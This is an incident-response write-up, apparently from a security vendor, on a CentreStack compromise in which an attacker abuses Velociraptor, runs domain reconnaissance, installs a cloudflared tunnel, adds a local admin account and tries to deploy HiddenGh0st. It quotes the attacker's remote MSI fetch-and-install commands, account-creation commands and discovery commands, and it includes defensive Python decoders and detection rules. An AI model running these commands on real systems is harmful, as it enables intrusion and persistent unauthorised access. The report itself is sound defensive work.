Jurassic SOC: When Velociraptor Gets Hijacked

The Blackpoint Response Operation Center (BROC) responded to an incident involving the exploitation of Gladinet Centrestack. The intrusion began on the CentreStack server within IIS. The portal application pool worker, w3wp.exe, spawned msiexec.exe as NT AUTHORITY\SYSTEM and immediately performed a quiet install from a remote Wasabi S3 URL, retrieving v4.msi.

This sequence reflected a direct pivot from the web application context into SYSTEM level execution and utilized MSI based delivery as the first stage payload mechanism. The remote installer was followed by the appearance and service execution of Velociraptor, indicating that v4.msi functioned as the Velociraptor deployment package.

After installation, Velociraptor was started as a SYSTEM service using a local client configuration file, shown by Velociraptor.exe --config "C:\Program Files\Velociraptor\client.config.yaml" service run. Right after the service was executed, the host began repeatedly issuing encoded PowerShell commands. These commands decoded into short, structured discovery tasks executed via native utilities.

The workflow included commands such as net time /do to query domain time, quser to list active interactive sessions, ipconfig /all to inventory network interfaces, DNS configuration, and domain context, and tasklist /v to capture a verbose process and service view with ownership and session data. The actor also ran setspn -Q VeeamBackupSVC/*, a targeted service principal name search to identify backup related accounts and infrastructure during early reconnaissance.

Discovery then expanded outward into Active Directory mapping. The actor executed nltest /domain_trusts to enumerate trust relationships, followed by nltest /dclist:<sub>.<domain> to identify domain controllers. They validated reachability to the identified domain controllers via ping.exe <DC>.<sub>.<domain>, then attempted to enumerate domain computer membership using net1.exe group "domain computers" /do. The sequence resulted in establishing an overview of the domain: by understanding trust paths first, locating authentication hubs next, confirming network access to them, and then enumerating potential endpoint targets.

With reconnaissance underway, the actor installed an additional remote access channel. Encoded PowerShell triggered a quiet MSI installation of cloudflared from GitHub, and immediately afterward ran cloudflared.exe service install <auth token>, creating a persistent Windows service tied to the provided token. This added an outbound tunnel operating over standard HTTPS egress, providing a separate path for remote control alongside Velociraptor’s tasking capability.

The actor also established local administrative access. Encoded commands translated to net1.exe user itadmin <password> /add, followed by net1.exe localgroup administrators itadmin /add. They then enumerated users with net1.exe user, and queried for a centrestack account, showing both situational awareness of existing access and the creation of a new privileged local foothold for interactive use.

The final observed phase showed attempted tooling expansion. PowerShell launched another quiet MSI install from files[.]catbox[.]moe/0nem4w.msi, then ran WMIC.exe product get to check the installed software state immediately after deployment.

Across the chain, the activity showed a rapid progression from CentreStack portal exploitation into SYSTEM level MSI delivery, deployment of Velociraptor for structured host and domain reconnaissance, installation of a persistent cloudflared tunnel service for resilient remote access, creation of a local administrator account for backup foothold, and a follow on MSI based payload attempt.

Key Findings

  • Initial Access: The actor gained entry through an internet facing CentreStack instance, with the IIS worker process w3wp.exe spawning msiexec.exe to perform a silent install of a remote MSI.
  • Post Exploitation Platform: Velociraptor was installed as a SYSTEM service and abused as a post exploitation tool for command execution.
  • Reconnaissance: The intrusion included broad host and Active Directory discovery, driven by scripted PowerShell and native Windows and AD enumeration utilities.
  • Payload Staging: Additional tooling, including a VS Code binary (code.exe), was downloaded from Cloudflare Workers and Wasabi S3.
  • C2 and Egress: cloudflared was installed and configured with a persistent token, creating an outbound tunnel for C2.
  • Persistence: A local user account, itadmin, was created and added to the local Administrators group.
  • Tradecraft: The intrusion relied on signed binaries, cloud hosted payloads, and dual use tools to avoid detection and maintain operational stealth.

Observed Killchain

Your CentreStack is Showing: Exposed Services & VelociRaptor Post-Compromise Tradecraft

The compromise began in the IIS worker process (w3wp.exe), which executed msiexec.exe to pull v4.msi directly from a Wasabi S3 bucket. This matched known CentreStack exploitation behavior, where attackers abuse the application’s public interface to pivot into the underlying Windows server.

Image 1 – Exploitation of Gladinet Centrestack

Analyzing the available IIS logs confirmed exploitation of Gladinet Centrestack. The IP tied to this exploitation was 45.45.218[.]115.

Image 2 – IIS Logs show 45.45.218[.]115 is tied to the Centrestack exploitation

Open-Source Intelligence (OSINT) found that this IP was tied to a HostHatch VPS. Threat actors leverage cheap and stolen VPS for these compromises as they provide an inexpensive and quick method for command and control. The HostHatch VPS in question was tied to the domain hellboyz[.]xyz.

Image 3 – Censys.io lookup on 45.45.218[.]115 

The execution of the v4.msi file installed Velociraptor onto the impacted server. Velociraptor is an open-source Digital Forensics and Incident Response (DFIR) platform that deploys lightweight endpoint clients and allows an operator to run remote “hunts”, collect artifacts, and execute VQL queries across fleets. It is built for legitimate investigation and monitoring, but can be abused to remotely execute commands, pull files, and perform reconnaissance as a fully-fledged post exploitation framework.

After Velociraptor was installed and started as a SYSTEM-level service, it immediately triggered a structured discovery routine by tasking a series of encoded PowerShell commands. Those PowerShell stagers acted as thin wrappers to launch built in Windows utilities, which is a common way to blend reconnaissance into normal administrative noise while still collecting high value context.

The sequence showed deliberate host and domain situational awareness: net time /do and its net1.exe handoff confirmed domain time and connectivity, quser.exe enumerated active interactive sessions and logged on users, ipconfig.exe /all harvested interface details, DNS servers, and domain suffixes, and tasklist.exe /v inventoried running processes with ownership and session metadata.

The actor then pivoted into identity and infrastructure targeting and queried SPNs with setspn.exe -Q VeeamBackupSVC/*, which suggested they were hunting for backup service accounts or servers, and performed group-based enumeration with net1.exe group "domain computers" /do which listed machine objects. In parallel, nltest.exe /domain_trusts and nltest.exe /dclist:<sub>.<domain> mapped trust relationships and domain controllers, while direct ping.exe to a DC validated reachability.
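As an added illustration (not code from the write-up or from Blackpoint), the following Python decodes -EncodedCommand process command lines and maps the decoded script to the discovery and foothold steps described above; the sample command lines, the domain name and the password are constructed placeholders.

```python
import base64
import re
# Discovery and foothold commands named in the write-up, mapped to what each reveals.
# Patterns are applied to the DECODED PowerShell text, case-insensitively.
SIGNATURES = {
    r"\bnet1?(\.exe)?\s+time\s+/do": "domain time / DC connectivity",
    r"\bquser(\.exe)?\b": "interactive sessions",
    r"\bipconfig(\.exe)?\s+/all": "interfaces, DNS, domain suffix",
    r"\btasklist(\.exe)?\s+/v": "processes with owner/session",
    r"\bsetspn(\.exe)?\s+-Q\s+\S+": "SPN hunting (backup service accounts)",
    r"\bnltest(\.exe)?\s+/domain_trusts": "domain trust mapping",
    r"\bnltest(\.exe)?\s+/dclist:": "domain controller discovery",
    r"\bnet1?(\.exe)?\s+group\s+[\"']?domain computers[\"']?\s+/do": "domain computer enumeration",
    r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add": "local account creation",
    r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add": "local admin elevation",
}

def decode_encoded_command(cmdline):
    """Return the script behind 'powershell -enc <b64>' (UTF-16LE), or None if not encoded."""
    m = re.search(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(script):
    """Labels of every signature the decoded script matches, in SIGNATURES order."""
    return [label for pat, label in SIGNATURES.items() if re.search(pat, script, re.IGNORECASE)]

def triage(cmdlines):
    """(decoded script, labels) for each encoded command line that performs a known step."""
    findings = []
    for cl in cmdlines:
        script = decode_encoded_command(cl)
        labels = classify(script) if script else []
        if labels:
            findings.append((script.strip(), labels))
    return findings

def _enc(script):
    # Builds CONSTRUCTED sample telemetry in the exact -enc form PowerShell accepts.
    return "powershell.exe -NoP -W Hidden -enc " + base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed process command lines mirroring the write-up's sequence (domain and password are placeholders).
SAMPLE_CMDLINES = [
    _enc("net time /do"),
    _enc("setspn -Q VeeamBackupSVC/*"),
    _enc("nltest /domain_trusts; nltest /dclist:sub.example.invalid"),
    _enc('net1 group "domain computers" /do'),
    _enc("net1 user itadmin Pw-CONSTRUCTED /add; net1 localgroup administrators itadmin /add"),
    "powershell.exe -Command Get-Date",  # benign and not encoded: ignored
]
```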

Image 4 – Enumeration of logged on users, IP configuration, and time

Image 5 – Enumeration of Tasklist via Velociraptor

Image 6 – Misspelling of “Domain Computers” during manual enumeration via Velociraptor

The actor pulled a secondary payload, code.exe, from the same Wasabi hosted infrastructure used earlier in the chain and wrote it into C:\ProgramData\Microsoft\code.exe. Placing the file under ProgramData in a Microsoft labeled subdirectory was an attempt to masquerade as the legitimate VS Code binary. After the drop, the host repeatedly invoked Get-FileHash against that exact path, which showed that the operator treated the file as a managed stage rather than a disposable artifact.

The pattern fits a workflow where the attacker verified payload integrity immediately after transfer, then rechecked it over time to confirm the on-disk binary still matched the expected version before tasking or execution. Frequent hashing also lined up with staged updates from remote storage, where tooling can be swapped in place, and the actor validated that the local copy was not modified or quarantined.

Image 7 – Downloading of code.exe from previously seen bucket

The Cloudflare activity appeared as a deliberate secondary access setup following Velociraptor based reconnaissance. Encoded PowerShell launched msiexec.exe in quiet mode which pulled and installed cloudflared-windows-amd64.msi directly from Cloudflare’s GitHub release path. Using MSI delivery here mirrored the earlier tool staging method and kept installation non interactive, which produced a standard Windows Installer footprint instead of a custom dropper.

Following the installation, another encoded PowerShell command executed cloudflared.exe service install <auth token>, which registered cloudflared as a persistent Windows service bound to the supplied token. The presence of both cloudflared.exe and the DOS 8.3 short-path invocation CLOUDF~1.EXE "C:\Program Files (x86)\cloudflared\cloudflared.exe" service install <auth token> showed the actor ensured the service install succeeded even if path parsing or quoting failed.

Once installed as a service under Program Files (x86), cloudflared could provide an outbound tunnel over standard HTTPS egress, giving the operator a resilient remote-control path that runs continuously and survives reboots alongside the Velociraptor service. This installation was blocked by Blackpoint's Managed Application Control (MAC).

Image 8 – Installation of Cloudflared and attempts to tunnel out 

Account activity in the telemetry showed that the actor moved from reconnaissance into access hardening by manipulating local users while existing identities tied to the application were surveyed. Encoded PowerShell first invoked net1.exe user itadmin <password> /add, which created a new local account with a preset credential, and then followed with net1.exe localgroup administrators itadmin /add, immediately elevating that account into the local Administrators group.

This activity portrays a foothold step designed to provide interactive admin access without relying on the original execution vector or tooling.

Image 9 – Creation of itadmin account and adding this user to local administrator group 

Immediately after establishing that backdoor, the actor ran net1.exe user to list accounts and then issued a targeted query for net1.exe user centrestack /do. In practice, this kind of lookup is used to confirm whether a predictable service or admin account exists, to understand naming conventions in the environment, and to identify potentially privileged identities that may be tied to the CentreStack deployment.

Image 10 – Enumeration of centrestack user

The actor then launched nltest /domain_trusts to enumerate trust relationships, which surfaced any outbound or inbound trust paths that could expand reach beyond the current domain. They followed by running nltest /dclist:<sub>.<domain>, which identified domain controllers for that namespace, then validated network reachability with ping.exe <DC>.<sub>.<domain>.

After that groundwork, activity shifted into hands on access to a domain controller using the newly created local admin foothold. The RDP session attributed to itadmin into a DC indicates the actor transitioned from discovery to direct administrative interaction with core directory infrastructure. Using that account for RDP also showed they were comfortable enough with its privileges and stability to rely on it for interactive work, not just as a backup credential.

The repeated quser.exe executions and the DC-targeted ping.exe <DC>.<sub>.<domain> events were reflective of Velociraptor tasked discovery from the CentreStack box itself. From that vantage point, quser.exe gave the operator a rolling view of interactive sessions present on the CentreStack server, letting them track whether administrators or service operators are logged in locally or over RDP and whether any live sessions are worth targeting.

Image 11 – Enumeration of Domain Trusts + locating of Domain Controllers

The later stage MSI activity showed the actor pivoting to an additional payload stream after Velociraptor and cloudflared. Encoded PowerShell launched msiexec.exe /q /i hxxps[://]files[.]catbox[.]moe/0nem4w.msi, which is a quiet, non-interactive install over HTTPS from a public file-sharing host. Using msiexec.exe again kept delivery consistent with the earlier toolkit staging, produced standard Windows Installer artifacts, and let the operator deploy a packaged implant without needing a custom loader.

Execution of the 0nem4w.msi file in the BROC’s sandbox confirmed it deploys HiddenGh0st, a variant of the Gh0st RAT that allows attackers to remotely operate a Windows machine, enabling them to run commands, move files, and monitor the system as if they were sitting in front of it.

Immediately after the MSI attempt, the actor ran WMIC.exe product get, which in this context reflects a post install sanity check. WMIC can surface newly registered MSI products, so firing it right after the install reads like the operator checking whether the package registered on the box or whether anything blocked it. Even if the MSI did not fully land, the sequence showed a clear attempt to add a second method of remote access.

Image 12 – Attempt to install HiddenGh0st

Investigation into the Velociraptor client configuration showed it was not operating in a standalone or local collection mode, but was instead pointed at a remote controller at auth[.]qgtxtebl[.]workers[.]dev. This configuration means the client was provisioned to beacon out to a specific endpoint for enrollment and ongoing tasking, using the server URL embedded in the YAML to retrieve jobs, upload results, and maintain a persistent management channel.

The hostname format indicated the infrastructure is hosted on a Cloudflare Workers subdomain, which provided a globally distributed HTTPS front that the client can reach over standard outbound ports without needing any custom listener exposed on the victim side.  

With that configuration in place, Velociraptor functioned as a full remote administration plane: the operator pushed VQL hunts, executed PowerShell and native binaries, pulled files, and staged additional tooling through the same channel. The presence of an explicit auth subdomain suggested the endpoint was used for agent authentication or gateway services rather than a random file host, reinforcing that this URL is part of the active control path for the deployed client. 
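As an added example (not the write-up's own tooling), the following Python reads Client.server_urls from a client.config.yaml excerpt and flags any controller that is not on an approved list, which is the check that separates a sanctioned Velociraptor deployment from a rogue one like the instance above. The config excerpt, the APPROVED_SERVERS set and the THROWAWAY_SUFFIXES list are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed client.config.yaml excerpt in the layout Velociraptor clients use; Client.server_urls is
# the list the agent beacons to. The hostname is the controller recovered in the write-up.
SAMPLE_CONFIG = """\
version:
  name: velociraptor
Client:
  server_urls:
    - https://auth.qgtxtebl.workers.dev/
  ca_certificate: |
    -----BEGIN CERTIFICATE-----
    CONSTRUCTED
    -----END CERTIFICATE-----
  nonce: CONSTRUCTED
"""

# Assumption: the organisation's sanctioned Velociraptor frontends; anything else is rogue.
APPROVED_SERVERS = {"velociraptor.corp.example.invalid"}
# Assumption: serverless/CDN fronts that a sanctioned deployment would not normally sit behind.
THROWAWAY_SUFFIXES = (".workers.dev", ".trycloudflare.com")

def extract_server_urls(yaml_text):
    """Dependency-free read of the block-style 'server_urls:' list (one '- url' per line)."""
    urls, in_list = [], False
    for line in yaml_text.splitlines():
        if re.match(r"^\s*server_urls:\s*$", line):
            in_list = True
            continue
        if in_list:
            m = re.match(r"^\s+-\s*(\S+)\s*$", line)
            if not m:
                break  # list ended
            urls.append(m.group(1))
    return urls

def assess_config(yaml_text, approved=APPROVED_SERVERS):
    """Return (url, reason) pairs for every unapproved server the client is provisioned to contact."""
    findings = []
    for url in extract_server_urls(yaml_text):
        host = (urlparse(url).hostname or "").lower()
        if host in approved:
            continue
        reason = "not an approved controller"
        if host.endswith(THROWAWAY_SUFFIXES):
            reason += "; hosted on a serverless/CDN front"
        findings.append((url, reason))
    return findings
```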

Image 13 – Velociraptor logs show Cloudflare Worker Domain is tied to Rogue instance

The activity showed a clean end to end intrusion flow that started with execution through the CentreStack IIS portal and quickly turned that foothold into SYSTEM level tool deployment. The actor used remote MSI installs to stage Velociraptor, then relied on Velociraptor tasking to run encoded PowerShell that fanned out into built in Windows reconnaissance, moving from host context to domain context through session checks, network and process inventory, SPN hunting, and trust and domain controller enumeration.

With the environment mapped, the threat actor established redundant access paths by installing cloudflared and registering it as a service, creating a privileged local user for interactive fallback, and continuing to manage secondary payloads from the same external infrastructure, including routinely validating an on disk code.exe and attempting an additional MSI delivered implant from catbox.

The killchain showcased an operator working methodically from initial access to reconnaissance, persistence, and expansion of readiness, leveraging a combination of dual use frameworks and native utilities to stay fast, scriptable, and resilient.

Recommendations

  • Eliminate direct internet exposure for CentreStack and any associated admin or management portals.
  • Track and alert on suspicious MSI activity, especially msiexec.exe reaching out to external URLs. Quiet or unattended MSI installations originating from the internet should be treated as high-risk and investigated quickly.
  • Reduce risk from remote management tool abuse by monitoring unapproved agents and binaries such as Velociraptor, ScreenConnect, Cloudflared, and comparable utilities.
    • Implement Blackpoint’s Managed Application Control (MAC) to block the execution of unauthorized applications.
  • Tighten outbound network controls and explicitly block tunneling utilities. Apply egress filtering and deny access to cloudflared, ngrok, and similar tunneling services unless there is a documented business need.
  • Review local administrator access for anomalies. Generate alerts on new local user creation, additions to privileged groups, and unexpected privilege changes across endpoints and servers.
  • Maintain continuous software inventory and integrity checks to confirm installed applications are legitimate and to catch unauthorized deployments or modifications early.
  • Leverage the Blackpoint SOC for sustained monitoring, detection engineering, and rapid response aligned to these intrusion patterns.
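The following Python is an added example (not Blackpoint's detection content) that turns the MSI, tunneling and local administrator recommendations above into stateful rules over constructed process-creation events: a remote quiet MSI pull (critical when the parent is a web-server worker, as with w3wp.exe in this intrusion), a cloudflared service install, and a net user /add followed within a short window by localgroup administrators /add. The URLs, token, password and the WEB_WORKERS set are assumptions.

```python
import re
from datetime import datetime, timedelta

# Rules derived from the chain above: remote quiet MSI pulls, tunnel service install,
# and local account creation quickly followed by local-admin elevation.
REMOTE_MSI = re.compile(r"(?i)msiexec(\.exe)?\s.*?/i\s+[\"']?https?://")
QUIET_FLAG = re.compile(r"(?i)\s/(q|qn|quiet)\b")
TUNNEL_INSTALL = re.compile(r"(?i)(cloudflared(\.exe)?|cloudf~1\.exe)\b.*\bservice\s+install\b")
USER_ADD = re.compile(r"(?i)\bnet1?(\.exe)?\s+user\s+(\S+)\s+\S+\s+/add\b")
ADMIN_ADD = re.compile(r"(?i)\bnet1?(\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b")
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe"}  # assumption: web-server parent images

def detect(events, admin_window=timedelta(minutes=10)):
    """Return (host, severity, rule, cmd) alerts for a list of process-creation events."""
    alerts, recent_adds = [], {}  # recent_adds: (host, user) -> time of 'net user /add'
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts, host, cmd = datetime.fromisoformat(ev["ts"]), ev["host"], ev["cmd"]
        if REMOTE_MSI.search(cmd):
            sev = "high" if QUIET_FLAG.search(cmd) else "medium"
            if ev["parent"].lower() in WEB_WORKERS:  # app pool -> installer: likely web RCE
                sev = "critical"
            alerts.append((host, sev, "remote MSI install", cmd))
        if TUNNEL_INSTALL.search(cmd):
            alerts.append((host, "high", "tunnel service install", cmd))
        if m := USER_ADD.search(cmd):
            recent_adds[(host, m.group(2).lower())] = ts
        if m := ADMIN_ADD.search(cmd):
            created = recent_adds.get((host, m.group(2).lower()))
            if created is not None and ts - created <= admin_window:
                alerts.append((host, "high", "new local admin within window", cmd))
    return alerts

def _ev(ts, parent, cmd, host="CSTACK01", user="NT AUTHORITY\\SYSTEM"):
    return {"ts": ts, "host": host, "user": user, "parent": parent, "cmd": cmd}

# Constructed Sysmon-EID-1-style events mirroring the write-up (URLs, token and password are placeholders).
SAMPLE_EVENTS = [
    _ev("2025-11-01T10:00:00", "w3wp.exe", "msiexec.exe /q /i https://storage.example.invalid/v4.msi"),
    _ev("2025-11-01T10:04:10", "powershell.exe",
        "msiexec.exe /q /i https://releases.example.invalid/cloudflared-windows-amd64.msi"),
    _ev("2025-11-01T10:04:30", "powershell.exe", "cloudflared.exe service install TOKEN-CONSTRUCTED"),
    _ev("2025-11-01T10:06:00", "powershell.exe", "net1 user itadmin Pw-CONSTRUCTED /add"),
    _ev("2025-11-01T10:06:02", "powershell.exe", "net1 localgroup administrators itadmin /add"),
    _ev("2025-11-01T11:30:00", "explorer.exe", 'msiexec.exe /i "C:\\Users\\jdoe\\Downloads\\7zip.msi"',
        user="CORP\\jdoe"),  # benign local install: no alert
]
```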

Indicators of Compromise (IOCs)

Network

Type   | Indicator | Context / Notes
Domain | hellboyz[.]xyz | Domain tied to Centrestack exploitation
Domain | s3[.]wasabisys[.]com | Bucket hosting Velociraptor install / VS Code
Domain | files[.]catbox[.]moe | File hosting site leveraged for staging of HiddenGh0st
Domain | upload[.]jbowpxyy[.]workers[.]dev | Staging domain
URL    | hxxps[://]github[.]com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi | Repo for Cloudflared
URL    | hxxps[://]s3[.]wasabisys[.]com/kiessler/v4.msi | Velociraptor installer
URL    | hxxps[://]upload[.]jbowpxyy[.]workers[.]dev/code[.]txt | VS Code binary

Files and Hashes

Item          | File name / Path | SHA256 | Context / Notes
Binary        | code.exe | 34b2a6c334813adb2cc70f5bd666c4afbdc4a6d8a58cc1c7a902b13bbd2381f4 | VS Code
RMM           | velociraptor.exe | 937e85f656a5761afc0d95821931f05bf8b13878c5c51245fe405f9d3724a788 | Velociraptor binary
MSI installer | v4.msi | 46831be6e577e3120084ee992168cca5af2047d4a08e3fd67ecd90396393b751 | Velociraptor installer
MSI installer | cloudflared-windows-amd64.msi | 6d2eea059b29d04bb4b68c4a1172e631df4a49c3e2a11195619533ae437c46d4 | Cloudflared installer
MSI installer | 0nem4w.msi | 32813a6fc180631353b84f69c3beb431c869e45aa7af4e6b2a5722586853a9ed | HiddenGh0st

Date published: November 25, 2025
Authors: Nevan Beal and Kevin Horton